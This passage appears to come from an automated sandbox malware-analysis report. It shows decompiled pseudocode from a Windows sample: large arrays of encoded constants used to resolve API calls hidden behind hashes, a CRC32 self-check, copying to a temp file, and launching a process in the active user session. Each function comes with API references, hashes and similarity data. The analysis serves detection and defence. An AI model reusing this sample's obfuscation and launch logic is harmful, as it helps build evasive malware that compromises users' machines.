				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				char _v704;

				_v704 = 0xf893fe23;
				_v700 = 0x96a93579;
				_v696 = 0x245c2aae;
				_v692 = 0xf26b8a8f;
				_v688 = 0x14c1b027;
				_v684 = 0xe0f0703e;
				_v680 = 0x88b3d872;
				_v676 = 0xa84285a9;
				_v672 = 0x47a43a6c;
				_v668 = 0xf852e92a;
				_v664 = 0xe5dfba2e;
				_v660 = 0xd7c59fdb;
				_v656 = 0xc3cbda99;
				_v652 = 0xcb41f718;
				_v648 = 0x6a64f5c4;
				_v644 = 0xdedf71d9;
				_v640 = 0xc4de6aec;
				_v636 = 0xfadcabb3;
				_v632 = 0x51f000a9;
				_v628 = 0x9adea939;
				_v624 = 0xb06b7dbe;
				_v620 = 0x2357ceb6;
				_v616 = 0x35749835;
				_v612 = 0x24a62c8;
				_v608 = 0x5593220e;
				_v604 = 0x3bac3701;
				_v600 = 0x3ed279c7;
				_v596 = 0xc38eec75;
				_v592 = 0xaa787b27;
				_v588 = 0xe66cbef7;
				_v584 = 0x3eba0d2d;
				_v580 = 0x80721929;
				_v576 = 0x647cf0de;
				_v572 = 0x6b060840;
				_v568 = 0xdb744423;
				_v564 = 0x56120815;
				_v560 = 0x16cc448e;
				_v556 = 0xaf1d3a70;
				_v552 = 0x84afcece;
				_v548 = 0x1f5b2bac;
				_v544 = 0x84987065;
				_v540 = 0x923c41c0;
				_v536 = 0x62b2d1f2;
				_v532 = 0x96e98167;
				_v528 = 0x6b9c643e;
				_v524 = 0x3bf32bb7;
				_v520 = 0x926b56ed;
				_v516 = 0xb2212760;
				_v512 = 0x3029804a;
				_v508 = 0x17afbdc1;
				_v504 = 0xe5215b81;
				_v500 = 0xa9a73174;
				_v496 = 0x38362969;
				_v492 = 0x2014a2e5;
				_v488 = 0x9bd1543c;
				_v484 = 0x9f02550a;
				_v480 = 0x70771f01;
				_v476 = 0xf57f7493;
				_v472 = 0xc2432019;
				_v468 = 0xfbc35934;
				_v464 = 0x7eef6c55;
				_v460 = 0xe5a1e850;
				_v456 = 0x95e16117;
				_v452 = 0x24148e16;
				_v448 = 0x7e86f567;
				_v444 = 0xd337dcd3;
				_v440 = 0xf1e0035b;
				_v436 = 0x7c2fa058;
				_v432 = 0xf68afb41;
				_v428 = 0xe89fcfb5;
				_v424 = 0x58132f2e;
				_v420 = 0xeb09708a;
				_v416 = 0x5042b9f5;
				_v412 = 0xa93c3553;
				_v408 = 0x5a85ccd8;
				_v404 = 0xad4d5cb9;
				_v400 = 0x72223e4b;
				_v396 = 0xa39693a8;
				_v392 = 0xef1aadfd;
				_v388 = 0x6cbdb06a;
				_v384 = 0xd7d937f8;
				_v380 = 0x596db643;
				_v376 = 0x230ce0c7;
				_v372 = 0x2d4bd8be;
				_v368 = 0xb37400f3;
				_v364 = 0x76b2403b;
				_v360 = 0xe15bf8ce;
				_v356 = 0xfc854871;
				_v352 = 0x6777c410;
				_v348 = 0xa6813d08;
				_v344 = 0x61441dae;
				_v340 = 0x7bc73fac;
				_v336 = 0xa81f123a;
				_v332 = 0x2f60e4b5;
				_v328 = 0x4165078e;
				_v324 = 0x81b3b60d;
				_v320 = 0x2f424b6a;
				_v316 = 0xe18acee1;
				_v312 = 0x40cb9f46;
				_v308 = 0xdcd07e81;
				_v304 = 0x77d948c4;
				_v300 = 0x8a50f65;
				_v296 = 0x69aaae5c;
				_v292 = 0x9aa1a84c;
				_v288 = 0x1177fe62;
				_v284 = 0x215e105a;
				_v280 = 0x568272bb;
				_v276 = 0x5f8f9ba2;
				_v272 = 0xae54d071;
				_v268 = 0x6814f89b;
				_v264 = 0x256969df;
				_v260 = 0x40871313;
				_v256 = 0x6ce1575a;
				_v252 = 0xbd3d788c;
				_v248 = 0x7ca8f87d;
				_v244 = 0x85fa53e6;
				_v240 = 0xd148325c;
				_v236 = 0x5e7ec80d;
				_v232 = 0xfdf502b7;
				_v228 = 0x2c986a2a;
				_v224 = 0xddbf220;
				_v220 = 0x4615f74b;
				_v216 = 0x5ca4c89f;
				_v212 = 0x146daa39;
				_v208 = 0xc823a9eb;
				_v204 = 0x367ea921;
				_v200 = 0xa498042b;
				_v196 = 0xca2acd0c;
				_v192 = 0xcac29f8f;
				_v188 = 0x581c0af8;
				_v184 = 0x54e383ca;
				_v180 = 0xe1d640da;
				_v176 = 0x26176d9b;
				_v172 = 0x44ba6c41;
				_v168 = 0xc7a769a8;
				_v164 = 0x14207816;
				_v160 = 0x60a483b3;
				_v156 = 0x2ec84207;
				_v152 = 0x55861a6c;
				_v148 = 0x9395ac55;
				_v144 = 0x7b3d468b;
				_v140 = 0xd742a34c;
				_v136 = 0xba1c8499;
				_v132 = 0xeedaef98;
				_v128 = 0x6fb05dd;
				_v124 = 0x51e8e4bc;
				_v120 = 0x78b88ff1;
				_v116 = 0xbd2f7124;
				_v112 = 0x56393da7;
				_v108 = 0xfe67bd5c;
				_v104 = 0x6bdb93e9;
				_v100 = 0xcd10dc31;
				_v96 = 0x10fa8214;
				_v92 = 0x66a75e2c;
				_v88 = 0xd4e5c57c;
				_v84 = 0xd9860dbd;
				_v80 = 0x6c05994b;
				_v76 = 0x3a6c9168;
				_v72 = 0x3ac0a209;
				_v68 = 0xeded3b06;
				_v64 = 0xc4e5c3d3;
				_v60 = 0x7666b774;
				_v56 = 0x18554a2e;
				_v52 = 0x9ba375a9;
				_v48 = 0x4225f3c7;
				_v44 = 0x59ee853;
				_v40 = 0xbef69b19;
				_v36 = 0x369b917b;
				_v32 = 0x5d702853;
				_v28 = 0x77e322b0;
				_v24 = 0x283b69ec;
				_v20 = 0x1e83f9c3;
				_v16 = 0xacacd89d;
				_v12 = 0x5dd1b9f2;
				_v8 = 0xedfd234e;
				_t186 = E00401A52(0x412360, 0x72fc3a35);
				 *0x4164f8 = LoadLibraryW(_t177);
				L00401B09(_t186);
				_push(0x415490);
				_push(0x6ae14ef1);
				return E004012FF( *0x4164f8,  &_v704, 0xaf);
			}


















































































































































































                  0x00409c07
                  0x00409c11
                  0x00409c1b
                  0x00409c25
                  0x00409c2f
                  0x00409c39
                  0x00409c43
                  0x00409c4d
                  0x00409c57
                  0x00409c61
                  0x00409c6b
                  0x00409c75
                  0x00409c7f
                  0x00409c89
                  0x00409c93
                  0x00409c9d
                  0x00409ca7
                  0x00409cb1
                  0x00409cbb
                  0x00409cc5
                  0x00409ccf
                  0x00409cd9
                  0x00409ce3
                  0x00409ced
                  0x00409cf7
                  0x00409d01
                  0x00409d0b
                  0x00409d15
                  0x00409d1f
                  0x00409d29
                  0x00409d33
                  0x00409d3d
                  0x00409d47
                  0x00409d51
                  0x00409d5b
                  0x00409d65
                  0x00409d6f
                  0x00409d79
                  0x00409d83
                  0x00409d8d
                  0x00409d97
                  0x00409da1
                  0x00409dab
                  0x00409db5
                  0x00409dbf
                  0x00409dc9
                  0x00409dd3
                  0x00409ddd
                  0x00409de7
                  0x00409df1
                  0x00409dfb
                  0x00409e05
                  0x00409e0f
                  0x00409e19
                  0x00409e23
                  0x00409e2d
                  0x00409e37
                  0x00409e41
                  0x00409e4b
                  0x00409e55
                  0x00409e5f
                  0x00409e69
                  0x00409e73
                  0x00409e7d
                  0x00409e87
                  0x00409e91
                  0x00409e9b
                  0x00409ea5
                  0x00409eaf
                  0x00409eb9
                  0x00409ec3
                  0x00409ecd
                  0x00409ed7
                  0x00409ee1
                  0x00409eeb
                  0x00409ef5
                  0x00409eff
                  0x00409f09
                  0x00409f13
                  0x00409f1d
                  0x00409f27
                  0x00409f31
                  0x00409f3b
                  0x00409f45
                  0x00409f4f
                  0x00409f59
                  0x00409f63
                  0x00409f6d
                  0x00409f77
                  0x00409f81
                  0x00409f8b
                  0x00409f95
                  0x00409f9f
                  0x00409fa9
                  0x00409fb3
                  0x00409fbd
                  0x00409fc7
                  0x00409fd1
                  0x00409fdb
                  0x00409fe5
                  0x00409fef
                  0x00409ff9
                  0x0040a003
                  0x0040a00d
                  0x0040a017
                  0x0040a021
                  0x0040a02b
                  0x0040a035
                  0x0040a03f
                  0x0040a049
                  0x0040a053
                  0x0040a05d
                  0x0040a067
                  0x0040a071
                  0x0040a07b
                  0x0040a085
                  0x0040a08f
                  0x0040a099
                  0x0040a0a3
                  0x0040a0ad
                  0x0040a0b7
                  0x0040a0c1
                  0x0040a0cb
                  0x0040a0d5
                  0x0040a0df
                  0x0040a0e9
                  0x0040a0f3
                  0x0040a0fd
                  0x0040a107
                  0x0040a111
                  0x0040a11b
                  0x0040a125
                  0x0040a12f
                  0x0040a139
                  0x0040a143
                  0x0040a14d
                  0x0040a157
                  0x0040a161
                  0x0040a16b
                  0x0040a175
                  0x0040a17f
                  0x0040a189
                  0x0040a193
                  0x0040a19d
                  0x0040a1a4
                  0x0040a1ab
                  0x0040a1b2
                  0x0040a1b9
                  0x0040a1c0
                  0x0040a1c7
                  0x0040a1ce
                  0x0040a1d5
                  0x0040a1dc
                  0x0040a1e3
                  0x0040a1ea
                  0x0040a1f1
                  0x0040a1f8
                  0x0040a1ff
                  0x0040a206
                  0x0040a20d
                  0x0040a214
                  0x0040a220
                  0x0040a22c
                  0x0040a233
                  0x0040a23a
                  0x0040a241
                  0x0040a248
                  0x0040a24f
                  0x0040a256
                  0x0040a25d
                  0x0040a264
                  0x0040a26b
                  0x0040a272
                  0x0040a279
                  0x0040a280
                  0x0040a28c
                  0x0040a297
                  0x0040a29c
                  0x0040a2ad
                  0x0040a2b2
                  0x0040a2c8

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040A28F
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: K>"r$S(p]$Ul~$ZWl$i)68$jKB/$i;(
                  • API String ID: 1029625771-3790624641
                  • Opcode ID: 0a649403d8d360f2a31862833572a2dea479a68f40ac8d43144fbebdc44cd8d9
                  • Instruction ID: 14f22b25c2d513f9b0b165bc48c778ba0d1b191eebadfcd767fb7a1b2c45f88c
                  • Opcode Fuzzy Hash: 0a649403d8d360f2a31862833572a2dea479a68f40ac8d43144fbebdc44cd8d9
                  • Instruction Fuzzy Hash: 3FE196B4C06369CFDB618F86AA897CDBB70BB01704F6082C9C5993B215CB755AC6CF85
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F3C5, Relevance: 12.1, APIs: 8, Instructions: 52fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0040F3C5() {
				void* _t1;
				void* _t10;
				void* _t12;
				void* _t14;

				_t1 = CreateFileW(0x416c50, 0x80000000, 1, 0, 3, 0, 0);
				_t14 = _t1;
				if(_t14 != 0xffffffff) {
					_t12 = CreateFileMappingW(_t14, 0, 2, 0, 0, 0);
					if(_t12 != 0) {
						_t10 = MapViewOfFile(_t12, 4, 0, 0, 0);
						if(_t10 != 0) {
							 *0x41574c = RtlComputeCrc32(0, _t10, GetFileSize(_t14, 0));
							UnmapViewOfFile(_t10);
						}
						CloseHandle(_t12);
					}
					return CloseHandle(_t14);
				}
				return _t1;
			}







                  0x0040f3da
                  0x0040f3e0
                  0x0040f3e5
                  0x0040f3f5
                  0x0040f3f9
                  0x0040f407
                  0x0040f40b
                  0x0040f421
                  0x0040f426
                  0x0040f426
                  0x0040f42d
                  0x0040f42d
                  0x00000000
                  0x0040f43a
                  0x0040f43d

                  APIs
                  • CreateFileW.KERNEL32(00416C50,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                  • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                  • GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                  • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                  • UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                  • CloseHandle.KERNEL32(00000000), ref: 0040F42D
                  • CloseHandle.KERNEL32(00000000), ref: 0040F434
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleView$ComputeCrc32MappingSizeUnmap
                  • String ID:
                  • API String ID: 3664593344-0
                  • Opcode ID: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction ID: 4f8756942f13f85b051569e497b215ae0a3eeb64e29cb283b43bbd1ff795de01
                  • Opcode Fuzzy Hash: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction Fuzzy Hash: F60131B22007187FF2211FA4ACCDFFB656CDB85B9BF108135FA11A12D0DAA44D014679
                  Uniqueness

                  Uniqueness Score: 0.14%

                  Function 0040FB72, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52UNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 563 40fb72-40fba0 call 40faa1 call 40f8e6 568 40fba2-40fbac call 401dcb 563->568 569 40fc18-40fc1c 563->569 568->569 572 40fbae-40fbfb call 401a52 call 401b09 call 401d2b 568->572 580 40fbfd-40fc09 CloseHandle * 2 572->580 581 40fc0f-40fc12 CloseHandle 572->581 580->581 581->569
                  C-Code - Quality: 87%
                  			E0040FB72(intOrPtr* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				void* _v20;
				void* _v24;
				char _v544;
				char _v1064;
				void* _t16;
				void* _t39;

				_v8 = _v8 & 0x00000000;
				E0040FAA1( &_v544);
				_t16 = E0040F8E6( &_v544,  *__ecx,  *((intOrPtr*)(__ecx + 4)));
				if(_t16 != 0) {
					_t16 = E00401DCB( &_v8);
					if(_t16 != 0) {
						_t39 = E00401A52(0x412e50, 0x55009ce0);
						 *0x4143a4( &_v1064, 0x104, _t39,  &_v544);
						_t33 = _t39;
						L00401B09(_t39);
						if(E00401D2B( &_v1064, _t33, _v8,  &_v24) != 0) {
							CloseHandle(_v24);
							CloseHandle(_v20);
						}
						return CloseHandle(_v8);
					}
				}
				return _t16;
			}










                  0x0040fb7b
                  0x0040fb88
                  0x0040fb98
                  0x0040fba0
                  0x0040fba5
                  0x0040fbac
                  0x0040fbbd
                  0x0040fbd3
                  0x0040fbdc
                  0x0040fbde
                  0x0040fbfb
                  0x0040fc00
                  0x0040fc09
                  0x0040fc09
                  0x00000000
                  0x0040fc12
                  0x0040fbac
                  0x0040fc1c

                  APIs
                    • Part of subcall function 0040FAA1: lstrlenW.KERNEL32(?), ref: 0040FAB5
                    • Part of subcall function 0040FAA1: GetTickCount.KERNEL32 ref: 0040FAC5
                    • Part of subcall function 0040F8E6: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040F900
                    • Part of subcall function 0040F8E6: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040F917
                    • Part of subcall function 0040F8E6: CloseHandle.KERNEL32(00000000), ref: 0040F920
                    • Part of subcall function 00401DCB: WTSGetActiveConsoleSessionId.KERNEL32 ref: 00401DD6
                    • Part of subcall function 00401DCB: CloseHandle.KERNEL32(00000000), ref: 00401DF6
                  • _snwprintf.NTDLL ref: 0040FBD3
                  • CloseHandle.KERNEL32(?), ref: 0040FC00
                  • CloseHandle.KERNEL32(?), ref: 0040FC09
                  • CloseHandle.KERNEL32(00000000), ref: 0040FC12
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$File$ActiveConsoleCountCreateSessionTickWrite_snwprintflstrlen
                  • String ID: g8Cw
                  • API String ID: 1860464474-3103284439
                  • Opcode ID: d21df1483eba43348c9a81eeec635097a7c991d75f1891da6298b92e764e64ff
                  • Instruction ID: aef8b5b249e02084cc47ae1663e45d8d954b77272b63b26d03dd396773520d47
                  • Opcode Fuzzy Hash: d21df1483eba43348c9a81eeec635097a7c991d75f1891da6298b92e764e64ff
                  • Instruction Fuzzy Hash: BA11867290011D9BDF21EB60DD05AEEB378EF44305F1044BAE905B21E1EB749F54CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F63A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 50UNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0040F63A(void* __ecx, void* __edx, void* __edi, void* __eflags) {
				short _v524;
				WCHAR* _t34;

				_t34 = 0;
				E00401000();
				if(E0040108B(0x416c50, 0x416840) == 0) {
					E00401503( &_v524, 0x104);
					GetTempPathW(0x104,  &_v524);
					GetTempFileNameW( &_v524, 0, 0,  &_v524);
					if(E0040108B(0x416840,  &_v524) != 0) {
						_t34 = E0040108B(0x416c50, 0x416840);
						_t38 = _t34;
						if(_t34 == 0) {
							E0040108B( &_v524, 0x416840);
						}
					}
				}
				E004010DC(_t38);
				return _t34;
			}





                  0x0040f645
                  0x0040f647
                  0x0040f65f
                  0x0040f66f
                  0x0040f67c
                  0x0040f68c
                  0x0040f6a2
                  0x0040f6b0
                  0x0040f6b2
                  0x0040f6b4
                  0x0040f6be
                  0x0040f6be
                  0x0040f6b4
                  0x0040f6a2
                  0x0040f6c3
                  0x0040f6cf

                  APIs
                    • Part of subcall function 00401000: GetFileAttributesW.KERNEL32(?,00000000,00000000), ref: 00401047
                    • Part of subcall function 00401000: CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                    • Part of subcall function 00401000: GetLastError.KERNEL32 ref: 00401064
                    • Part of subcall function 0040108B: memset.NTDLL ref: 004010A0
                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040F67C
                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 0040F68C
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileTemp$AttributesCreateDirectoryErrorLastNamePathmemset
                  • String ID: @hA$PlA$PlA
                  • API String ID: 9715921-2032501620
                  • Opcode ID: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction ID: 5d14a1be9669bfffb97e8a38806d051cd5262eb3adb47f349c5059f9eaae6cc3
                  • Opcode Fuzzy Hash: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction Fuzzy Hash: 7401AC31B0021417C72076658C459FB726D9F40355F00467BADC9E77B2EE39CD8687D8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040C601, Relevance: 7.5, APIs: 5, Instructions: 40synchronizationCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040C601(void* __eflags) {
				long _t3;
				void* _t4;
				long _t8;
				int _t13;

				_t13 = 0;
				if(E0040C4F5(__eflags) == 0) {
					L10:
					return _t13;
				}
				_t3 = WaitForSingleObject( *0x41548c, 0);
				if(_t3 == 0) {
					L3:
					_t4 = E0040C54E(_t17);
					_t18 = _t4;
					if(_t4 != 0 && E0040C5A7(_t18) != 0) {
						_t8 = SignalObjectAndWait( *0x414e6c,  *0x41365c, 0xffffffff, _t13);
						if(_t8 == 0 || _t8 == 0x80) {
							_t13 = ResetEvent( *0x414e6c);
						}
					}
					ReleaseMutex( *0x41548c);
					CloseHandle( *0x41548c);
					L9:
					goto L10;
				}
				_t17 = _t3 - 0x80;
				if(_t3 != 0x80) {
					goto L9;
				}
				goto L3;
			}







                  0x0040c602
                  0x0040c60b
                  0x0040c67e
                  0x0040c681
                  0x0040c681
                  0x0040c615
                  0x0040c622
                  0x0040c628
                  0x0040c628
                  0x0040c62d
                  0x0040c62f
                  0x0040c649
                  0x0040c651
                  0x0040c663
                  0x0040c663
                  0x0040c651
                  0x0040c66b
                  0x0040c677
                  0x0040c67d
                  0x00000000
                  0x0040c67d
                  0x0040c624
                  0x0040c626
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                    • Part of subcall function 0040C4F5: _snwprintf.NTDLL ref: 0040C51D
                    • Part of subcall function 0040C4F5: CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0040C535
                  • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040C615
                  • SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 0040C649
                  • ResetEvent.KERNEL32(?,?,0040F111), ref: 0040C65D
                  • ReleaseMutex.KERNEL32(?,?,0040F111), ref: 0040C66B
                  • CloseHandle.KERNEL32 ref: 0040C677
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: MutexObjectWait$CloseCreateEventHandleReleaseResetSignalSingle_snwprintf
                  • String ID:
                  • API String ID: 2255288334-0
                  • Opcode ID: 53fec47dd3a6376ce4d8dbe922b21d1394a5889b4255efbee4863a382fe81091
                  • Instruction ID: c0f7c5306684621e6a4500821fb11e6ef7d6b4f9c1040e922aa21da158988458
                  • Opcode Fuzzy Hash: 53fec47dd3a6376ce4d8dbe922b21d1394a5889b4255efbee4863a382fe81091
                  • Instruction Fuzzy Hash: 6AF03631544110DBDF312F76FC48A9A7A55AB45752714C736F801E12F0EA36C9109A5C
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Function 00408922, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 120libraryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 81%
                  			E00408922(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				char _v388;

				_v388 = 0xbe363562;
				_v384 = 0x358c1795;
				_v380 = 0xfc3978bd;
				_v376 = 0x5e88d697;
				_v372 = 0x1994d9f1;
				_v368 = 0x74012195;
				_v364 = 0x24e0d58c;
				_v360 = 0x21725a8d;
				_v356 = 0xa874821;
				_v352 = 0x8f4bb96f;
				_v348 = 0x7b30fa17;
				_v344 = 0x7ea7edad;
				_v340 = 0x48c44d52;
				_v336 = 0x2e75da4f;
				_v332 = 0x5ea70e4c;
				_v328 = 0x7310b874;
				_v324 = 0x673afa7a;
				_v320 = 0x7d7fe55;
				_v316 = 0x71d3ba3c;
				_v312 = 0x27174315;
				_v308 = 0xffc65c5a;
				_v304 = 0x71edd81f;
				_v300 = 0x88b5759d;
				_v296 = 0xa46eb22d;
				_v292 = 0x4e080454;
				_v288 = 0x773882f0;
				_v284 = 0x301340;
				_v280 = 0x27b6a846;
				_v276 = 0xd1630644;
				_v272 = 0x4beaf5bf;
				_v268 = 0x430858d;
				_v264 = 0xf02d0ada;
				_v260 = 0x21f77905;
				_v256 = 0xebc6db18;
				_v252 = 0x25fcc715;
				_v248 = 0x1f40551f;
				_v244 = 0xd9b12e44;
				_v240 = 0x41ea523d;
				_v236 = 0xeff774de;
				_v232 = 0x7e0b9da5;
				_v228 = 0x8adb486a;
				_v224 = 0xf7243b6d;
				_v220 = 0x2b80910;
				_v216 = 0xca5e3015;
				_v212 = 0x635d5a6e;
				_v208 = 0x46d9f790;
				_v204 = 0xd87c8cb3;
				_v200 = 0x3b391a04;
				_v196 = 0x80154553;
				_v192 = 0x26d9aa35;
				_v188 = 0xa780316d;
				_v184 = 0xcc58666d;
				_v180 = 0x1546d742;
				_v176 = 0xb874fe62;
				_v172 = 0x7dab30d9;
				_v168 = 0xae3670f3;
				_v164 = 0x2d39e7a8;
				_v160 = 0xc90b32b4;
				_v156 = 0xf86c708b;
				_v152 = 0x3d938887;
				_v148 = 0x857eaf68;
				_v144 = 0x4675d760;
				_v140 = 0x91021cb0;
				_v136 = 0x1e139331;
				_v132 = 0x9c4df91c;
				_v128 = 0xbf70c7da;
				_v124 = 0x1868d50e;
				_v120 = 0xaaeeea7a;
				_v116 = 0x676c626a;
				_v112 = 0x459ef5d;
				_v108 = 0xf6552739;
				_v104 = 0x628c522d;
				_v100 = 0x5094f550;
				_v96 = 0xdc8a394;
				_v92 = 0x753b5f8f;
				_v88 = 0xbcfd75c5;
				_v84 = 0xc39d1db2;
				_v80 = 0xfc32ffd;
				_v76 = 0xd8b5f26a;
				_v72 = 0xad049b88;
				_v68 = 0xaacdb83e;
				_v64 = 0x7a9519fc;
				_v60 = 0xa3bb9731;
				_v56 = 0x4be3cd7a;
				_v52 = 0xeb2ea36c;
				_v48 = 0xec09d4a5;
				_v44 = 0xf4140a91;
				_v40 = 0xb1a460b0;
				_v36 = 0x6fde7de0;
				_v32 = 0x1da135a9;
				_v28 = 0x1a3a8662;
				_v24 = 0xfe2095d7;
				_v20 = 0xf2fd9e2f;
				_v16 = 0xe2f8a12;
